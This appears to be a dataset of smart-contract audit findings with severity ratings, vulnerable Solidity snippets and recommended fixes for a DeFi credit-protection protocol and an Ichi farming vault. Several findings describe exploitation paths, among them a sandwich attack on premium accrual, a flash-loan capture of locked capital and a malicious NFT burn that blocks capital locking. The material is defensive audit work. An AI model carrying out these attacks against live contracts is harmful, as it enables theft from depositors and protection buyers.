when pool is expired in late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, pool is expired if time of credit line has ended or loan is fully paid.\\nState transition for lending pool is done inside `DefaultStateManager._assessState` function. This function is responsible to lock capital, when state is late and unlock it when it's changed from late to active again.\\nBecause the first state that is checked is `expired` there can be few problems.\\nFirst problem. Suppose that lending pool is in late state. So capital is locked. There are 2 options now: payment was done, so pool becomes active and capital unlocked, payment was not done then pool has defaulted. But in case when state is late, and lending pool expired or loan is fully repaid(so it's also becomes expired), then capital will not be unlocked as there is no such transition Late -> Expired. The state will be changed to Expired and no more actions will be done. Also in this case it's not possible to detect if lending pool expired because of time or because no payment was done.\\nSecond problem. Lending pool is in active state. Last payment should be done some time before `_creditLine.termEndTime()`. Payment was not done, which means that state should be changed to Late and capital should be locked, but state was checked when loan has ended, so it became Expired and again there is no such transition that can detect that capital should be locked in this case. The state will be changed to Expired and no more actions will be done.","These are tricky cases, think about transition for lending pool in such cases.","Depending on situation, capital can be locked forever or protection buyers will not be compensated.","```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n" +Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace period,high,"Existing buyers have an opportunity to renew their protection within grace period. If lending state update happens from `Active` to `LateWithinGracePeriod` just 1 second after a buyer's protection expires, protocol denies buyer an opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (its alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in future (or move to `default`, but both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer when she is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection` that checks if the user requesting renewal holds same NFT id on same lending pool address & that the current request is within grace period defined by protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew protection. This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating new protection - this check denies protection on loans that are in `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n","When a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\n","User who has been regularly renewing protection and paying premium to protect against a future loss event will be denied that very protection when she most needs it.\\nIf existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.","```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n" +Malicious seller forced break lockCapital(),high,"Malicious burn nft causes failure to lockCapital() ,seller steady earn PremiumAmount, buyer will be lost compensation\\nWhen the status of the lendingPool changes from Active to Late, the protocol will call ProtectionPool.lockCapital() to lock amount lockCapital() will loop through the active protections to calculate the `lockedAmount`. The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe important thing inside is to calculate the _remainingPrincipal by `referenceLendingPools.calculateRemainingPrincipal()`\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nGoldfinchAdapter.calculateRemainingPrincipal() The current implementation will first determine if the ownerOf the NFTID is _lender\\nThere is a potential problem here, if the NFTID has been burned, the ownerOf() will be directly revert, which will lead to calculateRemainingPrincipal() revert,and lockCapital() revert and can't change status from active to late\\nLet's see whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert\\nPoolTokens has burn() method , if principalRedeemed==principalAmount you can burn it\\n```\\ncontract PoolTokens is IPoolTokens, ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, ""ERC721Burnable: caller cannot burn this token"");\\n require(token.principalRedeemed == token.principalAmount, ""Can only burn fully redeemed tokens"");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2.ownerOf() if nftid don't exists will revert with message ""ERC721: owner query for nonexistent token""\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n }\\n```\\n\\nIf it can't changes to late, Won't lock the fund, seller steady earn PremiumAmount\\nSo there are two risks\\nnormal buyer gives NFTID to burn(), he does not know that it will affect all protection of the lendingPool\\nMalicious seller can buy a protection first, then burn it, so as to force all protection of the lendingPool to expire and get the PremiumAmount maliciously. buyer unable to obtain compensation\\nSuggested try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner","try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner",buyer will be lost compensation,"```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n" +function lockCapital() doesn't filter the expired protections first and code may lock more funds than required and expired defaulted protections may funded,medium,"when a lending loan defaults, then function `lockCapital()` get called in the ProtectionPool to lock required funds for the protections bought for that lending pool, but code doesn't filter the expired protections first and they may be expired protection in the active protection array that are not excluded and this would cause code to lock more fund and pay fund for expired defaulted protections and protection sellers would lose more funds.\\nThis `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see code loops through active protection array for that lending pool and calculates required locked amount but it doesn't call `_accruePremiumAndExpireProtections()` to make sure active protections doesn't include any expired protections. if function `_accruePremiumAndExpireProtections()` doesn't get called for a while, then there would be possible that some of the protections are expired and they are still in the active protection array. This would cause code to calculated more locked amount and also pay fund for those expired defaulted protections too from protection sellers. (also when calculating the required token payment for the protection code doesn't check the expiration too in the other functions that are get called by the `lockCapital()`, the expire check doesn't exists in inner function too)",call `_accruePremiumAndExpireProtections()` for the defaulted pool to filter out the expired protections.,see summery,"```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n" +"If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium",medium,"If the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for minimum premium\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor ""cannot be calculated,"" it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage ratio is above the floor, then protection cannot be purchased.\\nHowever, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. In this case, protection should be very expensive, but it will instead be very cheap.","Issue If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium\\nProhibit protection purchases when capital falls below the minimum required capital",Buyers can get very cheap protection at a time when it should be expensive.,"```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n" +secondary markets are problematic with how `lockCapital` works,medium,"Seeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.","I recommend you make `assessState` only callable by a trusted user. This would remove the attack vector, since you must hold the tokens over a transaction. It would still be possible to use the withdraw bug, but if that is fixed this would remove the possibility to ""flash-lock"".","An attacker can, using a flash loan from a secondary market like uniswap, steal a LPs possible share of unlocked tokens. Only paying taking the risk of the flash loan fee.",```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n +Sandwich attack to accruePremiumAndExpireProtections(),high,"Let's show how a malicious user, Bob, can launch a sandwich attack to `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens for the `ProtectionPool`, and `totalSupply = 1,000,000`, therefore the exchange rate is 1/1 share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is going to be called and add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass for an open phase. As a result, there are 1,100,000 underlying tokens, and 1,100,000 shares, the exchange rate is still 1/1 share. Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow accruePremiumAndExpireProtections()gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back, he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares and he will get `100,000*12/11 = 109,090` underlying tokens. So he has a profit of 9,090 underlying tokens by the sandwich attack.","Create a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond` to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdraw amount for each cycle.",A malicious user can launch a sandwich attack to accruePremiumAndExpireProtections()and profit.,"```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n" +Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards,high,"When a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. Part of this process is that their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, """");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again. The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.","Issue Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards\\nIn the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\n",Users who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.,"```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, """");\\n return id;\\n}\\n```\\n" +LP tokens are not sent back to withdrawing user,high,"When users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends them back the amount they requested to withdraw, leaving the tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow 